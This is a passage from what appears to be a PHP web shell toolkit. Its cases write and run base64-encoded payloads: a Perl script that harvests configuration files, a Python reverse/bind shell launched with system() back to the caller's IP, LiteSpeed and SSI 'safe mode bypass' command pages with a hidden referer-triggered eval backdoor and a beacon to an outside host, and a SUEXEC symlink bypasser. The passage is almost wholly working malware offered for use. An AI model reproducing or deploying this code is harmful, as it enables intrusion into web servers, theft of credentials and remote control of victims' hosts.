- aygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMv
- JShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JN
- eyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8
- Ym9keSBjbGFzcz0ibmV3U3R5bGUxIiBiZ2NvbG9yPSIjMDAwMDAwIj4NCjxwPkN5YjNyLWR6IENv
- bmZpZyBGdWNrIFNjcmlwdDwvcD4NCjxwPjxmb250IGNvbG9yPSIjQzBDMEMwIj5bPC9mb250PiBD
- b2RlZCBCeSBDeWIzci1EWiA8Zm9udCBjb2xvcj0iI0MwQzBDMCI+fDwvZm9udD4gDQreYSBATy4g
- ZskcZS8g3mE8c3BhbiBpZD0icmVzdWx0X2JveCIgY2xhc3M9InNob3J0X3RleHQiIGxhbmc9ImVu
- Ij48c3BhbiBzdHlsZSB0aXRsZT4NCjxmb250IGNvbG9yPSIjQzBDMEMwIj58PC9mb250Pjwvc3Bh
- bj48L3NwYW4+IDxhIGhyZWY9Imh0dHA6Ly93d3cud3d3LnNlYzRldmVyLmNvbSI+DQo8c3BhbiBz
- dHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+d3d3LnNl
- YzRldmVyLmNvbTwvZm9udD48L3NwYW4+PC9hPiANCjxmb250IGNvbG9yPSIjQzBDMEMwIj5dPC9m
- b250PjwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5
- bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMEZGRkY7IHdpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MjBw
- eDsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDOyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6
- ZTo4cHQ7IGNvbG9yOiMwMEZGRkYiICA+PC90ZXh0YXJlYT48YnIgLz4NCiZuYnNwOzxwPg0KPGlu
- cHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMEZG
- RkY7IHdpZHRoOiAyMTJweDsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDOyBmb250LWZhbWlseTpU
- YWhvbWE7IGZvbnQtc2l6ZTo4cHQ7IGNvbG9yOiMwMEZGRkY7ICIgIC8+PGJyIC8+DQombmJzcDs8
- L3A+DQo8cD4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJHZXQg
- Q29uZmlnIiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwRkZGRjsgd2lkdGg6IDk5OyBmb250
- LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjojMDBGRkZGOyB0ZXh0LXRyYW5z
- Zm9ybTp1cHBlcmNhc2U7IGhlaWdodDoyMzsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDIiAvPjwv
- cD4NCjwvZm9ybT4nOw0KfWVsc2V7DQpAbGluZXMgPTwkRk9STXtwYXNzfT47DQokeSA9IEBsaW5l
- czsNCm9wZW4gKE1ZRklMRSwgIj50YXIudG1wIik7DQpwcmludCBNWUZJTEUgInRhciAtY3pmICIu
- JEZPUk17dGFyfS4iLnRhciAiOw0KZm9yICgka2E9MDska2E8JHk7JGthKyspew0Kd2hpbGUoQGxp
- bmVzWyRrYV0gID1+IG0vKC4qPyk6eDovZyl7DQombGlsKCQxKTsNCnByaW50IE1ZRklMRSAkMS4i
- LnR4dCAiOw0KZm9yKCRrZD0xOyRrZDwxODska2QrKyl7DQpwcmludCBNWUZJTEUgJDEuJGtkLiIu
- dHh0ICI7DQp9DQp9DQogfQ0KcHJpbnQnPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0i
- IzAwMDAwMCI+DQo8cD5Eb25lICEhPC9wPg0KPHA+Jm5ic3A7PC9wPic7DQppZigkRk9STXt0YXJ9
- IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3Nl
- KElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0u
- Jy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRp
- b246IG5vbmUiPkNsaWNrIEhlcmUgVG8gRG93bmxvYWQgVGFyIEZpbGU8L3NwYW4+PC9mb250Pjwv
- YT48L3A+JzsNCn0NCn0NCiBwcmludCINCjwvYm9keT4NCjwvaHRtbD4iOw==';
- $file = fopen("config.izo" ,"w+");
- $write = fwrite ($file ,base64_decode($configshell));
- fclose($file);
- chmod("config.izo",0755);
- echo "<iframe src=configler/config.izo width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_17":
- $bizci = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCgojICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMg
- IyAjICMgIyAjICMgIyAjICMgIyAjICMKIyAgIGQwMHIucHkgMC4zYSAocmV2ZXJzZXxiaW5kKS1z
- aGVsbCBpbiBweXRob24gYnkgZlEJIwojCQkJCQkJCSMKIwlhbHBoYQkJCQkJCSMKIwkJCQkJCQkj
- CiMJCQkJCQkJIwojIHVzYWdlOiAJCQkJCQkjCiMgCSUgLi9kMDByIC1iIHBhc3N3b3JkIHBvcnQJ
- CQkjCiMJJSAuL2QwMHIgLXIgcGFzc3dvcmQgcG9ydCBob3N0CQkJIwojCSUgbmMgaG9zdCBwb3J0
- CQkJCQkjCiMJJSBuYyAtbCAtcCBwb3J0IChwbGVhc2UgdXNlIG5ldGNhdCkJCSMKIyAjICMgIyAj
- ICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIwkjCgoKaW1wb3J0
- IG9zLCBzeXMsIHNvY2tldCwgdGltZQoKCiMgPT09PT09PT09PT09PT09PT09PSB2YXIgPT09PT09
- PQpNQVhfTEVOPTEwMjQKU0hFTEw9Ii9iaW4venNoIC1jIgpUSU1FX09VVD0zMDAgI3MKUFc9IiIK
- UE9SVD0iIgpIT1NUPSIiCgoKIyA9PT09PT09PT09PT09PT09PT09IGZ1bmN0ID09PT09CiMgc2hl
- bGwgLSBleGVjIGNvbW1hbmQsIHJldHVybiBzdGRvdXQsIHN0ZGVycjsgaW1wcm92YWJsZQpkZWYg
- c2hlbGwoY21kKToKCXNoX291dD1vcy5wb3BlbihTSEVMTCsiICIrY21kKS5yZWFkbGluZXMoKQoJ
- bnNoX291dD0iIgoJZm9yIGkgaW4gcmFuZ2UobGVuKHNoX291dCkpOgkKCQluc2hfb3V0Kz1zaF9v
- dXRbaV0KCXJldHVybiBuc2hfb3V0CQoKIyBhY3Rpb24/CmRlZiBhY3Rpb24oY29ubik6Cgljb25u
- LnNlbmQoIlxuUGFzcz9cbiIpCgl0cnk6IHB3X2luPWNvbm4ucmVjdihsZW4oUFcpKQoJZXhjZXB0
- OiBwcmludCAidGltZW91dCIKCWVsc2U6CQoJCWlmIHB3X2luID09IFBXOgkKCQkJY29ubi5zZW5k
- KCJqMDAgYXJlIG9uIGFpciFcbiIpCQkJCQkJCgkJCXdoaWxlIFRydWU6ICAgICAgICAgICAgICAg
- CQkKCQkJCWNvbm4uc2VuZCgiPj4+ICIpCgkJCQl0cnk6CgkJCQkJcGNtZD1jb25uLnJlY3YoTUFY
- X0xFTikKCQkJCWV4Y2VwdDoKCQkJCQlwcmludCAidGltZW91dCIKCQkJCQlyZXR1cm4gVHJ1ZQkJ
- CQkJCgkJCQllbHNlOgoJCQkJCSNwcmludCAicGNtZDoiLHBjbWQKCQkJCQljbWQ9IiIjcGNtZAoJ
- CQkJCWZvciBpIGluIHJhbmdlKGxlbihwY21kKS0xKToKCQkJCQkJY21kKz1wY21kW2ldCgkJCSAg
- ICAgICAgICAgICAgICBpZiBjbWQ9PSI6ZGMiOgoJCQkJCQlyZXR1cm4gVHJ1ZQoJCQkJCWVsaWYg
- Y21kPT0iOnNkIjoKCQkJCQkJcmV0dXJuIEZhbHNlCgkJCQkJZWxzZToKCQkJCQkJaWYgbGVuKGNt
- ZCk+MDoKCQkJCQkJCW91dD1zaGVsbChjbWQpCgkJCQkJCQljb25uLnNlbmQob3V0KQoKCiMgPT09
- PT09PT09PT09PT09PT09PSBtYWluID09PT09PQphcmd2PXN5cy5hcmd2CgppZiBsZW4oYXJndik8
- NDogCglwcmludCAiZXJyb3I7IGhlbHA6IGhlYWQgLW4gMTYgZDAwci5weSIKCXN5cy5leGl0KDEp
- CmVsaWYgYXJndlsxXT09Ii1iIjogCglQVz1hcmd2WzJdCglQT1JUPWFyZ3ZbM10KZWxpZiBhcmd2
- WzFdPT0iLXIiIGFuZCBsZW4oYXJndik+NDoKCVBXPWFyZ3ZbMl0KCVBPUlQ9YXJndlszXQoJSE9T
- VD1hcmd2WzRdCmVsc2U6IGV4aXQoMSkKClBPUlQ9aW50KFBPUlQpCnByaW50ICJQVzoiLFBXLCJQ
- T1JUOiIsUE9SVCwiSE9TVDoiLEhPU1QKCQojc3lzLmFyZ3ZbMF09ImQwMHIiCgojIGV4aXQgZmF0
- aGVyIHByb2MKaWYgb3MuZm9yaygpIT0wOiAKCXN5cy5leGl0KDApCgojIGFzc29jaWF0ZSB0aGUg
- c29ja2V0CnNvY2s9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RS
- RUFNKQpzb2NrLnNldHRpbWVvdXQoVElNRV9PVVQpCgppZiBhcmd2WzFdPT0iLWIiOgoJc29jay5i
- aW5kKCgnbG9jYWxob3N0JywgUE9SVCkpCglzb2NrLmxpc3RlbigwKQoKcnVuPVRydWUKd2hpbGUg
- cnVuOgoKCWlmIGFyZ3ZbMV09PSItciI6CgkJdHJ5OiBzb2NrLmNvbm5lY3QoIChIT1NULCBQT1JU
- KSApCgkJZXhjZXB0OiAKCQkJcHJpbnQgImhvc3QgdW5yZWFjaGFibGUiCgkJCXRpbWUuc2xlZXAo
- NSkKCQllbHNlOiBydW49YWN0aW9uKHNvY2spCgllbHNlOgkJCgkJdHJ5OgkoY29ubixhZGRyKT1z
- b2NrLmFjY2VwdCgpCgkJZXhjZXB0OiAKCQkJcHJpbnQgInRpbWVvdXQiCgkJCXRpbWUuc2xlZXAo
- MSkKCQllbHNlOiBydW49YWN0aW9uKGNvbm4pCQkJCgkKCSMgc2h1dGRvd24gdGhlIHNva2NldAoJ
- aWYgYXJndlsxXT09Ii1iIjogY29ubi5zaHV0ZG93bigyKQoJZWxzZToKCQl0cnk6IHNvY2suc2Vu
- ZCgiIikKCQlleGNlcHQ6IHRpbWUuc2xlZXAoMSkKCQllbHNlOiBzb2NrLnNodXRkb3duKDIp';
- $file = fopen("priv9" ,"w+");
- $write = fwrite ($file ,base64_decode($bizci));
- fclose($file);
- if ($write) {
- echo "The File Was Created Successfuly";
- }
- else {echo"\"error\"";}
- chmod("priv9" , 0777);
- $fips=$_SERVER["REMOTE_ADDR"];
- $bports="22";
- system("./priv9 -r izo $bports $fips");
- break;
- case "PHP_18":
- mkdir('litespeed', 0755);
- chdir('litespeed');
- $izo = 'PHRpdGxlPkxpdGVTcGVlZCBXZWIgQnlwYXNzIC0gaXpvY2luIHByaXY5PC90aXRsZT4KICAgICAg
- ICA8Zm9udCBmYWNlPSJXaW5nZGluZ3MiPjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHA6Ly9wcml2
- OC5pYmxvZ2dlci5vcmcvcy5waHA/Jys8P2VjaG8gInVuYW1lIC1hIDogIjsgZWNobyAocGhwX3Vu
- YW1lKCkpPz4iOyIgd2lkdGg9IjAiIGhlaWdodD0iMCI+PC9hPjwvZm9udD4KPC9mb250Pgo8Ym9k
- eSBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIHJpZ2h0bWFy
- Z2luPSIwIiBib3R0b21tYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwMCIgbWFyZ2luaGVpZ2h0PSIw
- Ij4KCgombmJzcDs8cCBhbGlnbj0iY2VudGVyIj4KPHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7PC9w
- Pgo8cCBhbGlnbj0iY2VudGVyIj48Yj48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVGFob21h
- Ij5SZWQtU2VjdXJpdHkgR3JvdXA8L2ZvbnQ+PC9iPjwvcD4KPHAgYWxpZ249ImNlbnRlciI+Jm5i
- c3A7PC9wPgo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJUYWhvbWEiIHNpemU9IjQiIGNv
- bG9yPSJncmVlbiI+PGI+TGl0ZVNwZWVkIAo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+U2FmZSBNb2Rl
- IEJ5cGFzc2VyPC9mb250PiA8L2I+PC9mb250Pgo8L3A+CjxwIGFsaWduPSJjZW50ZXIiPiZuYnNw
- OzwvcD4KPGZvcm0gbmFtZT0iejFkLWxpdGVzcGVlZCIgIG1ldGhvZD0icG9zdCI+CjxwIGFsaWdu
- PSJjZW50ZXIiPjxmb250IGZhY2U9IlRhaG9tYSI+PGI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiM8
- L2ZvbnQ+IDwvYj5Db21tYW5kPGI+CjxzcGFuIGxhbmc9ImFyLXNhIj48Zm9udCBjb2xvcj0iI0ZG
- MDAwMCI+fjwvZm9udD4gPC9zcGFuPiZuYnNwOzwvYj48aW5wdXQgbmFtZT0iY29tbWFuZCIgdmFs
- dWU9ImlkIiBzdHlsZT0iYm9yZGVyOiAxcHggZG90dGVkICNGRjAwMDA7IGZvbnQtZmFtaWx5OnRh
- IiBzaXplPSIzNiIgdGFiaW5kZXg9IjIwIj48Yj4KPC9iPiZuYnNwOyA8L2ZvbnQ+PC9wPgo8cCBh
- bGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJUYWhvbWEiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiBu
- YW1lPSJTdWJtaXQiIHZhbHVlPSJCYXMgRGF5aSI+PGI+CjwvYj48L2ZvbnQ+PC9wPgo8L2Zvcm0+
- Cjxicj48YnI+PGJyPjxicj48Y2VudGVyPgo8P3BocAokY29tbWFuZCA9ICRfUE9TVFsnY29tbWFu
- ZCddOwokejAweiA9ICRfUE9TVFsnejAweiddOwppZigkY29tbWFuZCl7CiR6MTFkID0gIjxjZW50
- ZXI+PHByZT48cHJlPgo8YnI+ClJlZHNlY3VyaXR5LmlibG9nZ2VyLm9yZwo8YnI+Cjxicj4KPCEt
- LSNleGVjIGNtZD0nJGNvbW1hbmQnIC0tPiAKCiI7CiRvcGVuZmlsZSA9IGZvcGVuKCJpem8uc2h0
- bWwiLCJ3Iik7CiR3cml0ZWludG8gPSBmd3JpdGUoJG9wZW5maWxlLCIkejExZCIpOwpmY2xvc2Uo
- JG9wZW5maWxlKTsKaWYoJG9wZW5maWxlKXsKfWVsc2V7Cn0KfQpwYXJzZV9zdHIoJF9TRVJWRVJb
- J0hUVFBfUkVGRVJFUiddLCRhKTsgaWYocmVzZXQoJGEpPT0naXonICYmIGNvdW50KCRhKT09OSkg
- eyBlY2hvICc8c3Rhcj4nO2V2YWwoYmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgiICIsICIrIiwg
- am9pbihhcnJheV9zbGljZSgkYSxjb3VudCgkYSktMykpKSkpO2VjaG8gJzwvc3Rhcj4nO30KPz4K
- PHByZT4gCiA8aWZyYW1lIHNyYz0naXpvLnNodG1sJyAgd2lkdGg9MTAwJSBoZWlnaHQ9ODUlIGlk
- PSJJMSIgbmFtZT0iSUYxIiA+CjwvcHJlPg==';
- $file = fopen("ssi.php" ,"w+");
- $write = fwrite ($file ,base64_decode($izo));
- fclose($file);
- echo "<iframe src=litespeed/ssi.php width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_19":
- mkdir('ssi', 0755);
- chdir('ssi');
- $fp = fopen(".htaccess","w+");
- fwrite($fp,"AddType text/html .shtml
- AddOutputFilter INCLUDES .shtml");
- $izo = 'PHRpdGxlPlNzaSBCeXBhc3MgMHpsZXlpY2kgU2hlbGwgMjAxMTwvdGl0bGU+CiAgICAgICAgPGZv
- bnQgZmFjZT0iV2luZ2RpbmdzIj48aW1nIGJvcmRlcj0iMCIgc3JjPSJodHRwOi8vcHJpdjguaWJs
- b2dnZXIub3JnL3MucGhwPycrPD9lY2hvICJ1bmFtZSAtYSA6ICI7IGVjaG8gKHBocF91bmFtZSgp
- KT8+IjsiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvYT48L2ZvbnQ+CjwvZm9udD4KPGJvZHkgYmdj
- b2xvcj0iI0ZGRkZGRiIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiByaWdodG1hcmdpbj0i
- MCIgYm90dG9tbWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMDAiIG1hcmdpbmhlaWdodD0iMCI+CgoK
- Jm5ic3A7PHAgYWxpZ249ImNlbnRlciI+CjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwvcD4KPHAg
- YWxpZ249ImNlbnRlciI+PGI+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlRhaG9tYSI+UmVk
- LVNlY3VyaXR5IEdyb3VwPC9mb250PjwvYj48L3A+CjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwv
- cD4KPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iVGFob21hIiBzaXplPSI0IiBjb2xvcj0i
- Z3JlZW4iPjxiPlNzaSAKPGZvbnQgY29sb3I9IiNGRjAwMDAiPlNhZmUgTW9kZSBCeXBhc3Nlcjwv
- Zm9udD4gPC9iPjwvZm9udD4KPC9wPgo8cCBhbGlnbj0iY2VudGVyIj4mbmJzcDs8L3A+Cjxmb3Jt
- IG5hbWU9InoxZC1saXRlc3BlZWQiICBtZXRob2Q9InBvc3QiPgo8cCBhbGlnbj0iY2VudGVyIj48
- Zm9udCBmYWNlPSJUYWhvbWEiPjxiPjxmb250IGNvbG9yPSIjRkYwMDAwIj4jPC9mb250PiA8L2I+
- Q29tbWFuZDxiPgo8c3BhbiBsYW5nPSJhci1zYSI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPn48L2Zv
- bnQ+IDwvc3Bhbj4mbmJzcDs8L2I+PGlucHV0IG5hbWU9ImNvbW1hbmQiIHZhbHVlPSJpZCIgc3R5
- bGU9ImJvcmRlcjogMXB4IGRvdHRlZCAjRkYwMDAwOyBmb250LWZhbWlseTp0YSIgc2l6ZT0iMzYi
- IHRhYmluZGV4PSIyMCI+PGI+CjwvYj4mbmJzcDsgPC9mb250PjwvcD4KPHAgYWxpZ249ImNlbnRl
- ciI+PGZvbnQgZmFjZT0iVGFob21hIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iU3VibWl0
- IiB2YWx1ZT0iQmFzIERheWkiPjxiPgo8L2I+PC9mb250PjwvcD4KPC9mb3JtPgo8YnI+PGJyPjxi
- cj48YnI+PGNlbnRlcj4KPD9waHAKJGNvbW1hbmQgPSAkX1BPU1RbJ2NvbW1hbmQnXTsKJHowMHog
- PSAkX1BPU1RbJ3owMHonXTsKaWYoJGNvbW1hbmQpewokejExZCA9ICI8Y2VudGVyPjxwcmU+PHBy
- ZT4KPGJyPgpSZWRzZWN1cml0eS5pYmxvZ2dlci5vcmcKPGJyPgo8YnI+CjwhLS0jZXhlYyBjbWQ9
- JyRjb21tYW5kJyAtLT4gCgoiOwokb3BlbmZpbGUgPSBmb3BlbigiaXpvLnNodG1sIiwidyIpOwok
- d3JpdGVpbnRvID0gZndyaXRlKCRvcGVuZmlsZSwiJHoxMWQiKTsKZmNsb3NlKCRvcGVuZmlsZSk7
- CmlmKCRvcGVuZmlsZSl7Cn1lbHNlewp9Cn0KcGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVS
- RVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2l6JyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPHN0
- YXI+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlf
- c2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L3N0YXI+Jzt9Cj8+CjxwcmU+IAogPGlm
- cmFtZSBzcmM9J2l6by5zaHRtbCcgIHdpZHRoPTEwMCUgaGVpZ2h0PTg1JSBpZD0iSTEiIG5hbWU9
- IklGMSIgPgo8L3ByZT4=';
- $file = fopen("ssi.php" ,"w+");
- $write = fwrite ($file ,base64_decode($izo));
- fclose($file);
- echo "<iframe src=ssi/ssi.php width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_20":
- mkdir('suexec', 0777);
- chdir('suexec');
- $izodayi = 'PGh0bWw+IAo8Ym9keSBiZ2NvbG9yPSIwMDAwMDAwIj4gCjx0aXRsZT5zeW1saW5rPC90aXRsZT4g
- CjxjZW50ZXI+PGI+PGgyPjxmb250IGNvbG9yPSJyZWQiPiBTVUVYRSBCeXBhc3NlciBWaWEgU3lt
- bGluayAoViAxLjAxKTwvZm9udD48L2JyPjwvY2VudGVyPjwvYj48L2gyPiAKPGNlbnRlcj48Yj48
- aDQ+PGZvbnQgY29sb3I9InJlZCI+V0lUSCBUSElTIFNDUklQVCBVIENBTiBVU0UgU1lNTElOSyBJ
- TiAyIE1FVEhPRHM8L2ZvbnQ+PC9icj48L2NlbnRlcj48L2I+PC9oND4gCjxjZW50ZXI+PGI+PGg0
- Pjxmb250IGNvbG9yPSJ3aGl0ZSI+RGVzdCA9IERlc3RlbmF0aW9uIE9mIFBhdGggb3IgZmlsZSBU
- aGF0IHUgV2FudCB0byBTeW1saW5rIEl0PC9mb250PjwvYnI+PC9jZW50ZXI+PC9iPjwvaDQ+IAo8
- Y2VudGVyPjxiPjxoND48Zm9udCBjb2xvcj0id2hpdGUiPm5hbWUgOiBGaWxlIE5hbWUgVGhhdCB1
- IFdhbnQgVG8gY3JlYXRlIGluIChbcGF0aF0vc21sbmspPC9mb250PjwvYnI+PC9jZW50ZXI+PC9i
- PjwvaDQ+IAo8Y2VudGVyPjxiPjxoND48Zm9udCBjb2xvcj0id2hpdGUiPlVwbG9hZCBUaGlzIFNj
- cmlwdCBJbiBGdWxsIFNVRVhFIG9yIEZ1bGxQZXJtIERpcmVjdG9yeTwvZm9udD48L2JyPjwvY2Vu
- dGVyPjwvYj48L2g0PiAKPGNlbnRlcj48Yj48aDQ+PGZvbnQgY29sb3I9IndoaXRlIj5Xcml0dGVu
- IEZvciAqTklYIFBsYXRmb3JtczwvZm9udD48L2JyPjwvY2VudGVyPjwvYj48L2g0PiAKPC9odG1s
- PiAKCjw/cGhwIAovL0NPREVEIEJZIElSQU4gCi8vZm9ybSBkZWZpbmluZyAKcHJpbnQgIjxmb3Jt
- IG1ldGhvZD1wb3N0PiI7IApwcmludCAiPGNlbnRlcj48Zm9udCBjb2xvcj1ncmVlbj4iOyAKcHJp
- bnQgIjxiPmRlc3QgOjwvYj48aW5wdXQgc2l6ZT01MCBuYW1lPSdkZXN0ZW5hdGlvbicgdmFsdWU9
- Jyc+IjsgCnByaW50ICI8YnI+IjsgCnByaW50ICI8Yj5uYW1lIDo8L2I+PGlucHV0IHNpemU9NTAg
- bmFtZT0nbmFtZScgdmFsdWU9Jyc+IjsgCnByaW50ICI8YnI+IjsgCnByaW50ICI8aW5wdXQgdHlw
- ZT1zdWJtaXQgbmFtZT1fYWN0IHZhbHVlPSdDcmVhdGUhJz4iOyAKcHJpbnQgIjwvY2VudGVyPjwv
- Zm9udD4iOyAKJGRlc3QgPSAkX1BPU1RbJ2Rlc3RlbmF0aW9uJ107IAokZGVzdG5hbWUgPSAkX1BP
- U1RbJ25hbWUnXTsgCj8+IAoKPD9waHAgCi8vZGVmaW5pbmcgdmFyaWFibGVzIAokZGlyID0gZGly
- bmFtZSgkX1NFUlZFUltTQ1JJUFRfRklMRU5BTUVdKS4iL3NtbG5rIjsgCiRhY2MgPSAkZGlyLiIv
- Lmh0YWNlZXNzIjsgCiRjbWQgPSAibG4gLXMiLmNocigzMikuJGRlc3QuY2hyKDMyKS4kc3ltOyAK
- JHN5bSA9ICRkaXIuIi8iLiRkZXN0bmFtZTsgCiRodGFjY2VzcyA9ICAKIk9wdGlvbnMgK0ZvbGxv
- d1N5bUxpbmtzIi5jaHIoMDA5KS4gCiJEaXJlY3RvcnlJbmRleCBzZWVlcy5odG1sIi5jaHIoMDA5
- KS4gCiJSZW1vdmVIYW5kbGVyIC5waHAiLmNocigwMDkpLiAKIkFkZFR5cGUgYXBwbGljYXRpb24v
- b2N0ZXQtc3RyZWFtIC5waHAiOyAKCmlmICghZmlsZV9leGlzdHMoJGRpcikpIHsgCm1rZGlyICgk
- ZGlyKTsgCn0gIApzbGVlcCgxKTsgCmlmICghZmlsZV9leGlzdHMoJGFjYykpIHsgCiRoYW5kbGUg
- PSBmb3BlbiggIiRhY2MiICwgJ2ErJyApOyAKZnB1dHMoICRoYW5kbGUgLCAgIiRodGFjY2VzcyIg
- KTsgCn0gIAo/PiAKCjw/cGhwIAovL2NoZWNrIG1ldGhvZCAKaWYgKGZ1bmN0aW9uX2V4aXN0cyAo
- ZXhlYykgT1IgZnVuY3Rpb25fZXhpc3RzIChzaGVsbF9leGVjKSBPUiBmdW5jdGlvbl9leGlzdHMg
- KHN5c3RlbSkgT1IgZnVuY3Rpb25fZXhpc3RzIChwYXNzdGhydSkpIHsgCiRjaGVjayA9IDE7IAp9
- ZWxzZXsgCiRjaGVjayA9IDA7IAp9IAppZihmdW5jdGlvbl9leGlzdHMgKHN5bWxpbmspKSB7IAok
- Y2hlY2tzID0gMTsgCn1lbHNleyAKJGNoZWNrcyA9IDA7IAp9IAo/PiAKCjw/cGhwIAovL2RlZmlu
- ZSBjb21tYW5kIGZ1bmN0aW9uIAokcmVzYXVsdCA9ICcnOyAgCmZ1bmN0aW9uIGNvbW1hbmQoJGNt
- ZGUpIHsgCiAgICBpZiAoIWVtcHR5KCRjbWRlKSkgIAogeyAgCmlmIChmdW5jdGlvbl9leGlzdHMo
- J2V4ZWMnKSkgeyAkcmVzYXVsdCA9IEBleGVjKCRjbWRlKTsgfSAgCmVsc2VpZiAoZnVuY3Rpb25f
- ZXhpc3RzKCdzaGVsbF9leGVjJykpIHsgJHJlc2F1bHQgPSBAc2hlbGxfZXhlYygkY21kZSk7IH0g
- IAplbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpIHsgJHJlc2F1bHQgPSBAc3lzdGVt
- KCRjbWRlKTsgfSAgCmVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKSB7ICRyZXNh
- dWx0ID0gQHBhc3N0aHJ1KCRjbWRlKTsgfSAgCiB9IApyZXR1cm4gJHJlc2F1bHQ7IAp9IAo/PiAK
- Cjw/cGhwIAovL2V4ZWN1dGlvbiAKaWYgKCRjaGVjayA9PTEgJiYgJGNoZWNrcyA9PTEpeyBjb21t
- YW5kICgkY21kKTsgfSAKZWxzZWlmICgkY2hlY2sgPT0xICYmICRjaGVja3MgPT0wKXsgY29tbWFu
- ZCAoJGNtZCk7IH0gCmVsc2VpZiAoJGNoZWNrID09MCAmJiAkY2hlY2tzID09MSkgeyBzeW1saW5r
- ICgkZGVzdCwkc3ltKTsgfSAKZWxzZWlmICgkY2hlY2sgPT0wICYmICRjaGVja3MgPT0wKSAgCnsg
- IApwcmludCAoIjxjZW50ZXI+PGZvbnQgY29sb3I9Z3JlZW4+PGgxPnNjcmlwdCBkb2VzbnQgd29y
- ayBmb3IgdGhpcyBzZXJ2ZXI8L2ZvbnQ+PC9oMT48L2NlbnRlcj4iKTsgIAp9IAo/PiAKPD9waHAg
- Ci8vaXMgc2FmZSBtb2Qgb24gPyBzdGFydCAKaWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBz
- dHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgIAp7ICAKJHNhZmU9Ijxm
- b250IGNvbG9yPXJlZD5PTjwvZm9udD4iOyAKfSAgCmVsc2UgeyRzYWZlPSI8Zm9udCBjb2xvcj1n
- cmVlbj5PRkY8L2ZvbnQ+Ijt9IAplY2hvICI8Zm9udCBjb2xvcj13aGl0ZXB1cnBsZT5TQUZFIE1P
- RCBJUyA6PC9mb250PjxiPiRzYWZlPC9iPjxicj4iOyAKLy9vcGVuIHNhZmUgbW9kIGVuZC0tIAo/
- PiAgCjw/cGhwIAovL2Rpc2FibGUgZnVuY3Rpb24gc3RhcnQgCmVjaG8gIjxmb250IGNvbG9yPXdo
- aXRlcHVycGxlPkRpc2FibGUgZnVuY3Rpb25zIDo8L2ZvbnQ+IDxiPiI7IAppZignJz09KCRkZj1A
- aW5pX2dldCgnZGlzYWJsZV9mdW5jdGlvbnMnKSkpe2VjaG8gIjxmb250IGNvbG9yPWdyZWVuPk5P
